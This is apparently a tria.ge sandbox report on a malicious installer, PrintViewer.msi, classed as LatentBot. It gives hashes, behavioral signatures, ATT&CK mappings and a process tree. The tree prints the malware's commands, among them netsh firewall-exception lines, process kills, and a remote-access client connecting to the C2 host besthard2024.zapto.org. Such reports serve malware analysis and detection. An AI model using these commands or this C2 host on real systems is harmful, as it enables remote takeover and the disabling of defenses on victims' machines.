Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25/09/2024, 22:29
Static task
static1
Behavioral task
behavioral1
Sample
PrintViewer.msi
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
PrintViewer.msi
Resource
win10v2004-20240802-en
General
-
Target
PrintViewer.msi
-
Size
6.7MB
-
MD5
85f914ec316e8d20e8e13ef3719e04e4
-
SHA1
86ec276d409525bd8c1ef6d47ec8eece7639c0a2
-
SHA256
00ceea629efd7eb1d9eee5706ce8089336259c099fc4af274baf857bd1ddf230
-
SHA512
6a9eebfd6b4e794ab1fd949fa2093559460390a1d7843484e2086145e2ae968d8c347a3b3392aab2ebc41463cf97a3d36b23b6e8f80000949bb66c8eff3ba4e6
-
SSDEEP
98304:57vB+ZHiEZJMuI9JqwLOO+lzsnMHDqqxLSd7qqXR2EkLus6elw5Xe21NtcP33h3u:5IiiJiTqwLOTsMHDHBAI8kcXvWP1u
Malware Config
Extracted
latentbot
besthard2024.zapto.org
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 588 msiexec.exe 4 2612 msiexec.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2020 netsh.exe 2052 netsh.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIA194.tmp msiexec.exe File opened for modification C:\Windows\Installer\f7796b7.ipi msiexec.exe File created C:\Windows\Installer\f7796b4.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI99E4.tmp msiexec.exe File created C:\Windows\Installer\f7796b7.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIA50F.tmp msiexec.exe File opened for modification C:\Windows\Installer\f7796b4.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI982E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9ACF.tmp msiexec.exe -
Executes dropped EXE 4 IoCs
pid Process 2816 MSIA50F.tmp 2344 PrintDrivers.exe 2656 PrintDriver.exe 1600 PrintDrivers.exe -
Loads dropped DLL 4 IoCs
pid Process 1284 MsiExec.exe 1284 MsiExec.exe 1284 MsiExec.exe 1556 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
pid Process 588 msiexec.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PrintDrivers.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSIA50F.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PrintDrivers.exe -
Delays execution with timeout.exe 10 IoCs
pid Process 2524 timeout.exe 2580 timeout.exe 2960 timeout.exe 1032 timeout.exe 2140 timeout.exe 1456 timeout.exe 2888 timeout.exe 2220 timeout.exe 932 timeout.exe 2564 timeout.exe -
Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.
-
Kills process with taskkill 3 IoCs
pid Process 2108 taskkill.exe 780 taskkill.exe 384 taskkill.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1600 PrintDrivers.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2612 msiexec.exe 2612 msiexec.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe 2344 PrintDrivers.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 588 msiexec.exe Token: SeIncreaseQuotaPrivilege 588 msiexec.exe Token: SeRestorePrivilege 2612 msiexec.exe Token: SeTakeOwnershipPrivilege 2612 msiexec.exe Token: SeSecurityPrivilege 2612 msiexec.exe Token: SeCreateTokenPrivilege 588 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 588 msiexec.exe Token: SeLockMemoryPrivilege 588 msiexec.exe Token: SeIncreaseQuotaPrivilege 588 msiexec.exe Token: SeMachineAccountPrivilege 588 msiexec.exe Token: SeTcbPrivilege 588 msiexec.exe Token: SeSecurityPrivilege 588 msiexec.exe Token: SeTakeOwnershipPrivilege 588 msiexec.exe Token: SeLoadDriverPrivilege 588 msiexec.exe Token: SeSystemProfilePrivilege 588 msiexec.exe Token: SeSystemtimePrivilege 588 msiexec.exe Token: SeProfSingleProcessPrivilege 588 msiexec.exe Token: SeIncBasePriorityPrivilege 588 msiexec.exe Token: SeCreatePagefilePrivilege 588 msiexec.exe Token: SeCreatePermanentPrivilege 588 msiexec.exe Token: SeBackupPrivilege 588 msiexec.exe Token: SeRestorePrivilege 588 msiexec.exe Token: SeShutdownPrivilege 588 msiexec.exe Token: SeDebugPrivilege 588 msiexec.exe Token: SeAuditPrivilege 588 msiexec.exe Token: SeSystemEnvironmentPrivilege 588 msiexec.exe Token: SeChangeNotifyPrivilege 588 msiexec.exe Token: SeRemoteShutdownPrivilege 588 msiexec.exe Token: SeUndockPrivilege 588 msiexec.exe Token: SeSyncAgentPrivilege 588 msiexec.exe Token: SeEnableDelegationPrivilege 588 msiexec.exe Token: SeManageVolumePrivilege 588 msiexec.exe Token: SeImpersonatePrivilege 588 msiexec.exe Token: SeCreateGlobalPrivilege 588 msiexec.exe Token: SeRestorePrivilege 2612 msiexec.exe Token: SeTakeOwnershipPrivilege 2612 msiexec.exe Token: SeRestorePrivilege 2612 msiexec.exe Token: SeTakeOwnershipPrivilege 2612 msiexec.exe Token: SeRestorePrivilege 2612 msiexec.exe Token: SeTakeOwnershipPrivilege 2612 msiexec.exe Token: SeRestorePrivilege 2612 msiexec.exe Token: SeTakeOwnershipPrivilege 2612 msiexec.exe Token: SeRestorePrivilege 2612 msiexec.exe Token: SeTakeOwnershipPrivilege 2612 msiexec.exe Token: SeRestorePrivilege 2612 msiexec.exe Token: SeTakeOwnershipPrivilege 2612 msiexec.exe Token: SeRestorePrivilege 2612 msiexec.exe Token: SeTakeOwnershipPrivilege 2612 msiexec.exe Token: SeRestorePrivilege 2612 msiexec.exe Token: SeTakeOwnershipPrivilege 2612 msiexec.exe Token: SeRestorePrivilege 2612 msiexec.exe Token: SeTakeOwnershipPrivilege 2612 msiexec.exe Token: SeIncreaseQuotaPrivilege 772 WMIC.exe Token: SeSecurityPrivilege 772 WMIC.exe Token: SeTakeOwnershipPrivilege 772 WMIC.exe Token: SeLoadDriverPrivilege 772 WMIC.exe Token: SeSystemProfilePrivilege 772 WMIC.exe Token: SeSystemtimePrivilege 772 WMIC.exe Token: SeProfSingleProcessPrivilege 772 WMIC.exe Token: SeIncBasePriorityPrivilege 772 WMIC.exe Token: SeCreatePagefilePrivilege 772 WMIC.exe Token: SeBackupPrivilege 772 WMIC.exe Token: SeRestorePrivilege 772 WMIC.exe Token: SeShutdownPrivilege 772 WMIC.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 588 msiexec.exe 588 msiexec.exe 2656 PrintDriver.exe 2656 PrintDriver.exe 2656 PrintDriver.exe 2656 PrintDriver.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2656 PrintDriver.exe 2656 PrintDriver.exe 2656 PrintDriver.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2612 wrote to memory of 1284 2612 msiexec.exe 31 PID 2612 wrote to memory of 1284 2612 msiexec.exe 31 PID 2612 wrote to memory of 1284 2612 msiexec.exe 31 PID 2612 wrote to memory of 1284 2612 msiexec.exe 31 PID 2612 wrote to memory of 1284 2612 msiexec.exe 31 PID 2612 wrote to memory of 1284 2612 msiexec.exe 31 PID 2612 wrote to memory of 1284 2612 msiexec.exe 31 PID 2612 wrote to memory of 2816 2612 msiexec.exe 32 PID 2612 wrote to memory of 2816 2612 msiexec.exe 32 PID 2612 wrote to memory of 2816 2612 msiexec.exe 32 PID 2612 wrote to memory of 2816 2612 msiexec.exe 32 PID 2612 wrote to memory of 2816 2612 msiexec.exe 32 PID 2612 wrote to memory of 2816 2612 msiexec.exe 32 PID 2612 wrote to memory of 2816 2612 msiexec.exe 32 PID 2172 wrote to memory of 360 2172 cmd.exe 36 PID 2172 wrote to memory of 360 2172 cmd.exe 36 PID 2172 wrote to memory of 360 2172 cmd.exe 36 PID 2172 wrote to memory of 2812 2172 cmd.exe 37 PID 2172 wrote to memory of 2812 2172 cmd.exe 37 PID 2172 wrote to memory of 2812 2172 cmd.exe 37 PID 2172 wrote to memory of 1480 2172 cmd.exe 38 PID 2172 wrote to memory of 1480 2172 cmd.exe 38 PID 2172 wrote to memory of 1480 2172 cmd.exe 38 PID 1480 wrote to memory of 3012 1480 cmd.exe 39 PID 1480 wrote to memory of 3012 1480 cmd.exe 39 PID 1480 wrote to memory of 3012 1480 cmd.exe 39 PID 2172 wrote to memory of 772 2172 cmd.exe 40 PID 2172 wrote to memory of 772 2172 cmd.exe 40 PID 2172 wrote to memory of 772 2172 cmd.exe 40 PID 2172 wrote to memory of 468 2172 cmd.exe 41 PID 2172 wrote to memory of 468 2172 cmd.exe 41 PID 2172 wrote to memory of 468 2172 cmd.exe 41 PID 2172 wrote to memory of 1552 2172 cmd.exe 44 PID 2172 wrote to memory of 1552 2172 cmd.exe 44 PID 2172 wrote to memory of 1552 2172 cmd.exe 44 PID 2172 wrote to memory of 1556 2172 cmd.exe 45 PID 2172 wrote to memory of 1556 2172 cmd.exe 45 PID 2172 wrote to memory of 1556 2172 cmd.exe 45 PID 1556 wrote to memory of 1476 1556 cmd.exe 46 PID 1556 wrote to memory of 1476 1556 cmd.exe 46 PID 1556 wrote to memory of 1476 1556 cmd.exe 46 PID 1556 wrote to memory of 2020 1556 cmd.exe 47 PID 1556 wrote to memory of 2020 1556 cmd.exe 47 PID 1556 wrote to memory of 2020 1556 cmd.exe 47 PID 1556 wrote to memory of 2052 1556 cmd.exe 48 PID 1556 wrote to memory of 2052 1556 cmd.exe 48 PID 1556 wrote to memory of 2052 1556 cmd.exe 48 PID 1556 wrote to memory of 1576 1556 cmd.exe 49 PID 1556 wrote to memory of 1576 1556 cmd.exe 49 PID 1556 wrote to memory of 1576 1556 cmd.exe 49 PID 1556 wrote to memory of 236 1556 cmd.exe 50 PID 1556 wrote to memory of 236 1556 cmd.exe 50 PID 1556 wrote to memory of 236 1556 cmd.exe 50 PID 1556 wrote to memory of 2656 1556 cmd.exe 51 PID 1556 wrote to memory of 2656 1556 cmd.exe 51 PID 1556 wrote to memory of 2656 1556 cmd.exe 51 PID 2172 wrote to memory of 2564 2172 cmd.exe 52 PID 2172 wrote to memory of 2564 2172 cmd.exe 52 PID 2172 wrote to memory of 2564 2172 cmd.exe 52 PID 2172 wrote to memory of 384 2172 cmd.exe 53 PID 2172 wrote to memory of 384 2172 cmd.exe 53 PID 2172 wrote to memory of 384 2172 cmd.exe 53 PID 2172 wrote to memory of 1456 2172 cmd.exe 54 PID 2172 wrote to memory of 1456 2172 cmd.exe 54
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\PrintViewer.msi1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:588
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C1475CDEF1295FC629A3817603867D182⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1284
-
-
C:\Windows\Installer\MSIA50F.tmp"C:\Windows\Installer\MSIA50F.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2816
-
-
C:\Games\PrintDrivers.exe"C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2344
-
C:\Windows\system32\cmd.execmd /c ""C:\Games\PrintDrivers.cmd" "1⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\system32\mode.comMode 90,202⤵PID:360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul2⤵PID:2812
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description2⤵
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\system32\reg.exeReg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description3⤵PID:3012
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where (name="PrintDriver.exe") get commandline2⤵
- Suspicious use of AdjustPrivilegeToken
PID:772
-
-
C:\Windows\system32\findstr.exefindstr /i "PrintDriver.exe"2⤵PID:468
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"2⤵PID:1552
-
-
C:\Windows\system32\cmd.execmd2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\system32\mode.comMode 90,203⤵PID:1476
-
-
C:\Windows\system32\netsh.exenetsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2020
-
-
C:\Windows\system32\netsh.exenetsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2052
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where (name="PrintDriver.exe") get commandline3⤵PID:1576
-
-
C:\Windows\system32\findstr.exefindstr /i "PrintDriver.exe"3⤵PID:236
-
-
C:\Games\PrintDriver.exeC:\Games\PrintDriver.exe -autoreconnect ID:52521093 -connect besthard2024.zapto.org:5500 -run3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2656
-
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:2564
-
-
C:\Windows\system32\taskkill.exetaskkill /im rundll32.exe /f2⤵
- Kills process with taskkill
PID:384
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:1456
-
-
C:\Windows\system32\taskkill.exetaskkill /im rundll32.exe /f2⤵
- Kills process with taskkill
PID:2108
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:2524
-
-
C:\Windows\system32\taskkill.exetaskkill /im rundll32.exe /f2⤵
- Kills process with taskkill
PID:780
-
-
C:\Games\PrintDrivers.exeC:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1600
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Games\driverhelp.cmd" "1⤵PID:1960
-
C:\Windows\system32\mode.comMode 90,202⤵PID:2776
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul2⤵PID:2788
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description2⤵PID:2852
-
C:\Windows\system32\reg.exeReg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description3⤵PID:2712
-
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:2888
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:2580
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:2220
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:2960
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:1032
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:2140
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:932
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Installer Packages
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Installer Packages
1Netsh Helper DLL
1Defense Evasion
Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
1System Binary Proxy Execution
1Msiexec
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
418KB
MD5da71fc32022f1f8e8a53a87d095fb809
SHA136036f59bcb9c501033b45f9d04252541ec65073
SHA256b026dda7534cf3985996cbd462dc5f9f6cc16ac4e89692e33252579474c78bfc
SHA5120fd1fdb39e4325d4d741674ac7ee1462f7c42c69c435279b099deff79e0b1ddabe35acabf9cd722c3aa88e4ef77250107831d56549e716212b025adea9abf1ea
-
Filesize
1KB
MD56eb13f7936a83f4c44842029914aad6e
SHA17b9b27731d4ca6f996ce68c5d68b4d653e31d915
SHA2568d9bb49947d9dc7fa7be7310149a99f13a0c02580fd996aae31c69d673775c49
SHA512227788193867b2f99a62ae792d91562ad46ea3fa0855cf6ef28fc0de31d43f2e671c6ef50e534f0235f1f663769715bef162913a554e86e581fe05455373623e
-
Filesize
1KB
MD5eacc690f71a77685f030bef23b506b91
SHA103b911ba997d44028bf515ea44fe4813b4b4a785
SHA2560f1d30740f2e46b22b86fb01acdabbd02440d7dbebe963a405fb3a5661b23263
SHA5129870aa4dc699b74bfc8fb53df0c74686913f42ea2321bee39786e5be696fb081e3dfdac1b312f3c439c14e3061f35cefe820ef1ac5c853274ca0c867bf50a54d
-
Filesize
403KB
MD529ed7d64ce8003c0139cccb04d9af7f0
SHA18172071a639681934d3dc77189eb88a04c8bcfac
SHA256e48aac5148b261371c714b9e00268809832e4f82d23748e44f5cfbbf20ca3d3f
SHA5124bdd4bf57eaf0c9914e483e160182db7f2581b0e2adc133885bf0f364123d849d247d3f077a58d930e80502a7f27f1457f7e2502d466aec80a4fbeebd0b59415
-
Filesize
1KB
MD5b9dfbea744cc6c65473a97f2b959e44c
SHA1c022f1d97fa56d61ad935aafa4e9e59e611e746a
SHA2566f95a4eff9b0c2eaf37104b323d2b09c037aa7c3d472a1887c0f7914aa6c835d
SHA512b92c8ea3583eb87f365b96cd45562cac2c4343e281c5090fc00db3f03bb5538a2d8aea3c39449d8d79cad31ed3692f6045266811d50fdd69807d8b12a9649eb5
-
Filesize
870B
MD5fd3b5847ddb8a31413951c0aa870ab95
SHA1e3e91e3e9fa442cd1937422120de91da87973ddb
SHA256e4f5e16dfe9bbe6d63f266103c35c0035a2d4014f516420190b7cfafb02b08ad
SHA5125d8599f7d6f0824ab30118f5680bf89d28c1e7e9de4ed61af9074cb9d339619d59dab8e5818dc93dcf5b27ad9e8a863c5d082f8f829aa8c4a026ec5da2454096
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD56739754396934cf18d5169c8c7ac7d2a
SHA19b8cd3e8844e43c703a1366ea4eaabc54d5e981a
SHA256d29aae5dfa44dfc79fbe4b6b0d2381a30ae499be1db60c624affe61bd1bc3c6d
SHA5122f6296d19a3bacc4d664ac4b495c41e5fdb1ecabd30dfd8dfceff315c8131af67dccb43d9112b33fa54a05907125f110e48a9e81c60906d46e4c96446a32b2a5
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
413KB
MD5c8311ded7db427ce2c2879558ce8a8c1
SHA11895ce48297025dc005ebebc8256ac6d62013dec
SHA2566fc76509f00c8ac81b597feeab520e684d190d831d828ca318d1e54afbf4a193
SHA512d293885ef98f4e3fd9794500b8d560354cec3227916df05027f8c311076c60f11b6857e4e0ab0618f4d42da8141b42bcfb829a3a43b29a73ce0aa9967a80a232
-
Filesize
2.8MB
MD527c1c264c6fce4a5f44419f1783db8e0
SHA1e071486e4dfef3a13f958a252d7000d3ce7bfd89
SHA25629379afd1ca5439c82931d623fda335174dc416e5b013591457fa1f7bbe564db
SHA512a80a512be6f152e8737cd5d0a0a2a193eaf88f3bfb7ed6b7695d227e195db278e2734ebfc9fe48a68cfb13e4e5bb7fb4825019cfa2210ba741ecf8b11f954a98
-
Filesize
936KB
MD513056f6fc48a93c1268d690e554f4571
SHA1b83de3638e8551a315bb51703762a9820a7e0688
SHA256aeda49baf2d79da2f7a9266f1fb7884111c2620e187090321f5278af5131c996
SHA512ca828b4248e399178a8614f941332d159a30bad0156df0d5f4c4ca9d74d0ccb61fac59f34c945f5f914e22ec639bd97718f76d21b452825b07fe4041d1a44824